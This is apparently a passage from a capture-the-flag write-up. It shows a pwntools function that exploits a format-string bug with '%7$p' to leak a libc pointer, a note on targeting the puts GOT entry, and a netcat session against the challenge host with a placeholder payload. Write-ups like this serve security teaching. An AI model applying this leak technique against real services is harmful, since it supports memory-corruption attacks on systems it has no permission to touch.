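from pwn import remote

# HOST and PORT (the challenge endpoint) are defined elsewhere in the script.
def leak_libc():
    io = remote(HOST, PORT)
    io.recvuntil(b'> ')
    # %7$p prints the 7th format-string argument as a pointer
    io.sendline(b'echo %7$p')
    io.recvuntil(b'Result: ')
    leak = int(io.recvline().strip(), 16)  # parse the hex pointer that was printed
    io.close()
    return leak
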
The program is dynamically linked, so we can leak a libc address from the GOT. The GOT entry for puts is a good target because it’s already resolved.

$ (printf "echo %s\n" "<payload>" ; cat) | nc challenge.ctf.com 31137
Welcome to Incezt Net!
> echo <payload>
Result: <some garbled output>